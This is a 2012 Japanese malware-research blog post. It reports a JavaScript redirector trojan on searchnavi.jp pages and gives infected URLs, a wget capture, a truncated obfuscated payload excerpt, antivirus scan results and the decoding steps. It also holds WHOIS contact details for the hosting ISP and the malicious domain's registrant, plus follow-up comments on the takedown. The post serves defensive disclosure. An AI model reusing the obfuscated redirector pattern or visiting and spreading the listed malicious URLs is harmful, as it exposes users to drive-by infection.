土曜日, 2月 11, 2012

【マルウェア報告】 #OCJP-011: searchnavi.jp(61.194.62.161)にTROJAN-JAVASCRIPT-REDIRECTOR発見!


下記のサイト↓
searchnavi.jp / 61.194.62.161

下記のURL↓

hxxp://hathomas.searchnavi.jp/dup1rt7it/ hxxp://muvreela.searchnavi.jp/3jy4hxu1d/ hxxp://izpe4.searchnavi.jp/gygp84bex/ hxxp://jakemonky.searchnavi.jp/hgvml1jjx/ hxxp://bosaxton.searchnavi.jp/nvw1dzjom/ hxxp://hogratie.searchnavi.jp/f3iug6l68/ hxxp://hogratie.searchnavi.jp/xdo3fhn34/ hxxp://hogratie.searchnavi.jp/y1t4u39px/ hxxp://dirtyrulenta.searchnavi.jp/zvtomi8nz/ hxxp://maabraha.searchnavi.jp/gofbmtzr4/ hxxp://blankpage.searchnavi.jp/mdee1ybpa/ hxxp://maabraha.searchnavi.jp/cv5cjd16i/ hxxp://sea0tter12.searchnavi.jp/gogkefkbz/ hxxp://sea0tter12.searchnavi.jp/jenrrvdlr/ hxxp://sea0tter12.searchnavi.jp/lbyc4mzmo/ hxxp://sea0tter12.searchnavi.jp/prvpkh3id/ hxxp://sea0tter12.searchnavi.jp/aixownyns/ hxxp://sea0tter12.searchnavi.jp/opzqlkmuc/ hxxp://maabraha.searchnavi.jp/hmjg7bjoa/ hxxp://maabraha.searchnavi.jp/hvhhadih3/ hxxp://maabraha.searchnavi.jp/njapfdu5e/ hxxp://palpaciya.searchnavi.jp/drgcbbzkt/ hxxp://spcritte.searchnavi.jp/y945iagmq/

下記のマルウェアを発見しました↓

アファイル  :「index.html」 マルウェア種類: JAVA-SCRIPT マルウェア名 : TROJAN-JAVASCRIPT-REDIRECTOR マルウェア機能: ブラウザ経由のトロイ 説明     : 感染されたサイトをアクセスしたらマルウェアサイトへにあるスクリプトを実行させる

マルウェアが未だアップされている証拠↓

Sat Feb 11 18:26:36 JST 2012 --18:38:44-- hxxp://hathomas.searchnavi.jp/dup1rt7it/ => `index.html' Resolving hathomas.searchnavi.jp... 61.194.62.161 Connecting to hathomas.searchnavi.jp|61.194.62.161|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] [ <=> ] 6,791 --.--K/s 18:38:45 (3.86 MB/s) - `index.html' saved [6791] $ cat index.html↓ <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nj auto dealership , Mitsubishi electric automotive america inc.</title> <META NAME="ROBOTS" CONTENT="NOARCHIVE"> </head> <body><script> document.write(unescape("%3C%73%63%72%69%70%74%3E%66%75%6E%63%74%69% 6F%6E%20%74%72%63%61%74%28%61%63%63%6F%66%29%20%20%7B%76%61%72%20%64 %65%6C%78%61%20%3D%20%75%6E%65%73%63%61%70%65%28%20%61%63%63%6F%66%2 E%73%75%62%73%74%72%28%20%30%2C%20%61%63%63%6F%66%2E%6C%65%6E%67%74% : : </script>

マルウェアのスキャン結果↓

MD5: 4210f1541d9d16772d82c2d0aae1c512 File size: 6.6 KB ( 6791 bytes ) File name: index.html File type: HTML Detection ratio: 29 / 43 Analysis date: 2012-02-11 10:12:48 UTC SCAN RESULT: 【現段階の結果に付いて、ここをクリックして下さい】 ----------------------------------------------------------------------------- Antivirus Result Update ----------------------------------------------------------------------------- AhnLab-V3 - 20120210 AntiVir HTML/FakeAlert.I 20120210 Antiy-AVL - 20120211 Avast HTML:Iframe-LH [Trj] 20120211 AVG JS/Redir.AU 20120211 BitDefender Trojan.Redirector.JS.AG 20120211 ByteHero - 20120211 CAT-QuickHeal - 20120211 ClamAV - 20120211 Commtouch JS/Crypted.Q.gen 20120211 Comodo TestSignature.JS.Downloader.Agent.KA 20120211 DrWeb - 20120211 Emsisoft Trojan-Downloader.HTML.Renos!IK 20120211 eSafe - 20120208 eTrust-Vet HTML/MalScr!Generic 20120211 F-Prot JS/Crypted.Q.gen 20120209 F-Secure Trojan.Redirector.JS.AG 20120211 Fortinet JS/Agent.NVV!tr 20120211 GData Trojan.Redirector.JS.AG 20120211 Ikarus Trojan-Downloader.HTML.Renos 20120211 Jiangmin - 20120210 K7AntiVirus Trojan 20120210 Kaspersky - 20120211 McAfee Generic FakeAlert.ai 20120211 McAfee-GW-Edition Heuristic.BehavesLike.JS.CodeUnfolding.C 20120210 Microsoft TrojanDownloader:HTML/Renos.D 20120211 NOD32 JS/TrojanDownloader.Agent.NVV 20120211 Norman JS/Agent.WB 20120210 nProtect Trojan.Redirector.JS.AG 20120211 Panda JS/Redirector.Y 20120210 PCTools Trojan.Malscript 20120207 Prevx - 20120211 Rising Trojan.DL.Script.JS.Agent.ra 20120210 Sophos Troj/JSRedir-S 20120211 SUPERAntiSpyware - 20120206 Symantec Trojan.Malscript!html 20120211 TheHacker - 20120210 TrendMicro HTML_AGENT.SCP 20120211 TrendMicro-HouseCall HTML_AGENT.SCP 20120211 VBA32 - 20120210 VIPRE Trojan-Downloader.HTML.Renos.d (v) 20120211 ViRobot - 20120211 VirusBuster JS.Redirector.Gen.6 20120211

マルウェア調査↓

1.HTMLファイルにBODYのタグの次直ぐにマルウェアのSCRIPTコードが始まります。   画像はこんな感じです↓    2.見にくいコードですね、obfuscated scriptと言います。   自分のdecoderを設定して1回decodeしましたら、下記のコードふぁ出てきました↓    3.これでも未だ分からないので、4回迄にやればマルウェアのコードが解けた↓      ↑ここでマルウェアのURLを発見しました。 4.マルウェアのURLをアクセスしたら、firefoxでは既にブロックされている状況です(^^   

感染されたサイトのドメイン情報(連絡先の為に)

[Domain Name] SEARCHNAVI.JP [Registrant] onlyoneserver [Name] onlyoneserver [Email] info@muryou-rs.jp [Web Page] http://muryou-rs.jp/ [Postal code] 170 [Postal Address] [Phone] 03-6304-1755

感染されたサイトのネットワーク情報(連絡先の為に)

a. [Network Number] 61.194.56.0/21 b. [Network Name] INFOSPHERE g. [Organization] InfoSphere (NTTPC Communications, Inc.) m. [Administrative Contact] YI10840JP n. [Technical Contact] YI10840JP n. [Technical Contact] JP00050961 a. [JPNICハンドル] YI10840JP b. [氏名] 市川 雄一 c. [Last, First] Ichikawa, Yuuichi d. [電子メイル] y-ichi@nttpc.co.jp f. [組織名] 株式会社エヌ・ティ・ティ ピー・シー コミュニケーションズ g. [Organization] NTT PC Communications, Inc. [グループハンドル] JP00050961 [グループ名] ネットワーク部 サービスエンジニアリング担当 [Group Name] Network Planning & Operation Department [電子メール] tech-info@nw.sphere.ad.jp [組織名] 株式会社NTTPCコミュニケーションズ [Organization] NTTPC Communications, Inc. [部署] ネットワーク部 サービスエンジニアリング担当 [Division] Network Planning & Operation Department [電話番号] 03-6203-2737 [FAX番号] 03-3500-5413 [最終更新] 2009/10/08 19:41:05(JST) ip@sphere.ad.jp

マルウェアサイトのインターネット情報(海外のフォローの為に)↓

ドメイン登録情報↓ Domain ID:D20979141-LRMS Domain Name:TANGOING.INFO Created On:31-Oct-2007 14:54:46 UTC Last Updated On:22-Dec-2011 14:01:21 UTC Expiration Date:31-Oct-2012 14:54:46 UTC Sponsoring Registrar:Regtime Ltd. (R455-LRMS) Status:OK ID:CO374655-RT Name:Daniils Nikiforovs Organization:n/a Street1:Kalnciema Street 186 Street2: Street3: City:Riga State/Province: Postal Code:1046 Country:LV Phone:+371.27702718 Phone Ext.: FAX: FAX Ext.: Email:dophshli@gmail.com Name Server:NS1.DNSEXIT.COM Name Server:NS2.DNSEXIT.COM ↑ドメインのインターネットルーティング図↓ IPアドレスの情報は↓ アメリカのでーたセンター↓

----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック

4 件のコメント:

  1. マルウェアファイルが削除してくれたそうです。
    対応は終了です、下記は証拠↓

    --16:32:43-- http://hathomas.searchnavi.jp/dup1rt7it/
    => `index.html'
    Resolving hathomas.searchnavi.jp... 61.194.62.161
    Connecting to hathomas.searchnavi.jp|61.194.62.161|:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    16:32:43 ERROR 404: Not Found.

    ご協力頂き誠に有難う御座います。

    返信削除
  2. 新しい感染されたHTMLファイルが出てきました↓
    http://machampa.searchnavi.jp/z21glgemd/
    http://hpoducky.searchnavi.jp/9oioorzvk/
    http://hpoducky.searchnavi.jp/q6uclbdh7/
    http://hpoducky.searchnavi.jp/g6xnbtfky/
    http://machampa.searchnavi.jp/anjaq5maj/
    http://machampa.searchnavi.jp/vmog6669a/
    http://hpoducky.searchnavi.jp/44dpin7w2/
    同じマルウェアです。。。感染仕組みは未だ動いている最中との事です。
    感染ソースを潰したい為にsearchnavi.jpのHTTPログ調査が必要です。

    unixfreaxjp

    返信削除
  3. 上記の新しい感染されたサイトの調査結果はVTサイトに書きました↓

    https://www.virustotal.com/file/5005dc017d7fee0e414eaf0a4db3ed6725c516a9c70464efbdc8dc97d1cc6e01/analysis/1329574249/

    返信削除
  4. 本件の海外感染ソースを発見し、手続きの上でソースを停止されておりました。
    10日間の様子見で本件の感染されたURLが増えない事を確認しましたので、
    本事件の対応は終了です。

    本件に付きまして沢山ご迷惑をおかけてしまいましたが、
    ご協力頂き有難う御座いました!本当にお疲れ様でした。

    返信削除